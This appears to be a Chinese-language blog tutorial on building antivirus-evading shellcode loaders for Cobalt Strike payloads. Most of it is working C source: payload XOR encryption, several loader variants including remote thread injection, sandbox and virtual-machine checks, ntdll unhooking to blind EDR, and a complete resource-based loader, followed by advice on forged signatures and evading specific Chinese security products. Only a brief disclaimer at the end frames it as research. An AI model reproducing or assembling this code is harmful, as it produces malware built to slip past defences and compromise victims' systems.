【Web实战】先锋马免杀分享
字数 1169 2025-08-10 08:28:47
先锋马免杀技术详解
一、Shellcode自身免杀技术
1. Shellcode加密与编码方法
-
常见加密/编码方式:
- 编码方式:Base64、SGN编码
- 加密方式:XOR、RC4强加密、UUID
-
010 Editor XOR加密实践:
- 使用010 Editor打开CS生成的bin文件
- 选择XOR加密功能
- 设置XOR密钥(示例使用0x39)
- 保存加密后的bin文件
-
推荐加密组合:
- XOR双加密
- XOR加密 + SGN编码
- XOR加密 + Base64编码
- UUID + Base64编码
二、Shellcode加载方式详解
1. 指针直接执行
#include <Windows.h>
#include <stdio.h>
unsigned char shellcodeloader[] = "shellcode";
int main()
{
((void(*)(void)) & shellcodeloader)();
}
2. 申请内存执行
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "shellcode";
void* run = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(run, shellcode, sizeof shellcode);
((void(*)())run)();
}
3. 资源加载Shellcode(推荐方式)
关键API函数:
FindResource:定位资源位置SizeofResource:获取资源大小LoadResource:加载资源到内存
完整实现代码:
DWORD oldProtect;
BOOL pt;
HRSRC shellcodeResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD_BIN1), L"PAYLOAD_BIN");
HGLOBAL shellcodeResourceData = LoadResource(NULL, shellcodeResource);
DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);
4. 无API加载Shellcode
#pragma section(".text")
__declspec(allocate(".text")) char goodcode[] = { };
int main()
{
((void(*)())(&goodcode))();
}
5. 设置data段可执行
#include <Windows.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] = { };
int main()
{
((void(*)())(void*)shellcode)();
}
6. 远程线程注入
关键API函数:
OpenProcess:打开远程进程句柄VirtualAllocEx:在远程进程分配内存WriteProcessMemory:写入Shellcode到远程内存CreateRemoteThread:创建远程线程执行Shellcode
完整实现代码:
#include <Windows.h>
#include <stdio.h>
int main(int argc, char* argv[])
{
unsigned char shellcode[] = {};
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode,
(MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 0,
(LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);
return 0;
}
7. RW+RX内存技术
实现步骤:
- 使用
VirtualAlloc申请RW内存 - 使用
memcpy拷贝Shellcode - 使用
VirtualProtect改为RX权限 - 执行Shellcode
实现代码:
#include <Windows.h>
int main() {
int shellcode_size = 0;
BOOL pt;
DWORD oldProtect;
unsigned char buf[] = { };
shellcode_size = sizeof(buf);
LPVOID shellcode = VirtualAlloc(NULL, shellcode_size, MEM_COMMIT, 0x04);
CopyMemory(shellcode, buf, shellcode_size);
pt = VirtualProtect(shellcode, shellcode_size, 0x20, &oldProtect);
((void(*)())shellcode)();
}
三、反沙箱技术
1. 沙箱检测方法
- 系统运行时间检测:
ULONG uptime = GetTickCount();
if (uptime < 10 * 60 * 1000) { // 少于10分钟
exit(1);
}
- 进程数量检测:
void BypassSimulation()
{
HANDLE snapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe = { sizeof(pe) };
int num = 0;
for (BOOL ret = Process32First(snapShot, &pe); ret; ret = Process32Next(snapShot, &pe))
{
num++;
}
if (num <= 60) // 进程数少于60
{
exit(1);
}
}
- 语言环境检测:
int check() {
LANGID langId = GetUserDefaultUILanguage();
if (PRIMARYLANGID(langId) != LANG_CHINESE)
{
exit(1);
}
return 0;
}
- 虚拟机检测:
bool CheckProcess() {
const char* list[4] = { "vmtoolsd.exe","vmwaretrat.exe","vmwareuser.exe","vmacthlp.exe" };
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
BOOL bResult = Process32First(hProcessSnap, &pe32);
while (bResult) {
char ss_Name[MAX_PATH] = { 0 };
WideCharToMultiByte(CP_ACP, 0, pe32.szExeFile, -1, ss_Name, sizeof(ss_Name), NULL, NULL);
for (int i = 0; i < 4; i++) {
if (strcmp(ss_Name, list[i]) == 0)
return false;
}
bResult = Process32Next(hProcessSnap, &pe32);
}
return true;
}
四、EDR对抗技术
1. 清除NTDLL Hook
实现原理:
- 从磁盘加载干净的ntdll.dll
- 覆盖内存中被Hook的.text段
完整实现代码:
DWORD UNHOOKntdll() {
MODULEINFO mi = {};
HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");
GetModuleInformation(HANDLE(-1), ntdllModule, &mi, sizeof(mi));
LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll",
GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL,
PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);
PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);
for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
PIMAGE_SECTION_HEADER hookedSectionHeader =
(PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader)
+ ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
DWORD oldProtection = 0;
VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress),
(LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize);
VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
}
}
CloseHandle(ntdllFile);
CloseHandle(ntdllMapping);
FreeLibrary(ntdllModule);
return 0;
}
五、完整实现方案
1. 资源加载型Shellcode执行器
完整代码:
#include <Windows.h>
#include <wincrypt.h>
#include <string.h>
#include <stdlib.h>
#include <winreg.h>
#include <tlhelp32.h>
#include <time.h>
#include "resource.h"
#include <io.h>
#pragma comment(lib, "Crypt32.lib")
#include <psapi.h>
#include <iostream>
#include <stdio.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
// 此处包含上述UNHOOKntdll()、BypassSimulation()、check()等函数
int main(int argc, char* argv[])
{
// 反沙箱检测
BypassSimulation();
check();
ULONG uptime = GetTickCount();
if (uptime < 10 * 60 * 1000) {
exit(1);
}
// 清除EDR Hook
UNHOOKntdll();
DWORD oldProtect;
BOOL pt;
// 加载并执行加密的Shellcode
HRSRC shellcodeResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD_BIN1), L"PAYLOAD_BIN");
HGLOBAL shellcodeResourceData = LoadResource(NULL, shellcodeResource);
DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);
LPSTR shell = (LPSTR)VirtualAlloc(0, shellcodeSize, MEM_COMMIT, PAGE_READWRITE);
memcpy(shell, shellcodeResourceData, shellcodeSize);
// XOR解密 (密钥需与加密时一致)
for (int i = 0; i < shellcodeSize; i++) {
shell[i] ^= 0x39;
}
pt = VirtualProtect(shell, shellcodeSize, PAGE_EXECUTE_READ, &oldProtect);
((void(*)())shell)();
return 0;
}
2. VS项目配置要点
-
编译配置:
- 设置为Release模式
- 平台选择x86
- 代码生成设置为MT(静态链接运行时库)
-
资源文件添加:
- 在资源视图中添加资源
- 导入加密后的bin文件
- 重命名为PAYLOAD_BIN类型
-
数字签名对抗:
- 添加图标和版本信息
- 使用伪造的数字签名(针对某些EDR产品)
六、注意事项
-
对抗环境选择:
- 火绒环境:可尝试进程/线程注入
- 某数字杀软晶核环境:避免注入,推荐直接执行或注入自身进程
-
免杀效果维持:
- 定期更换加密密钥和组合方式
- 根据目标环境调整反沙箱策略
- 保持代码混淆和变种
-
法律风险提示:
- 本技术文档仅供安全研究学习使用
- 实际使用需获得合法授权
- 未经授权使用可能涉及法律风险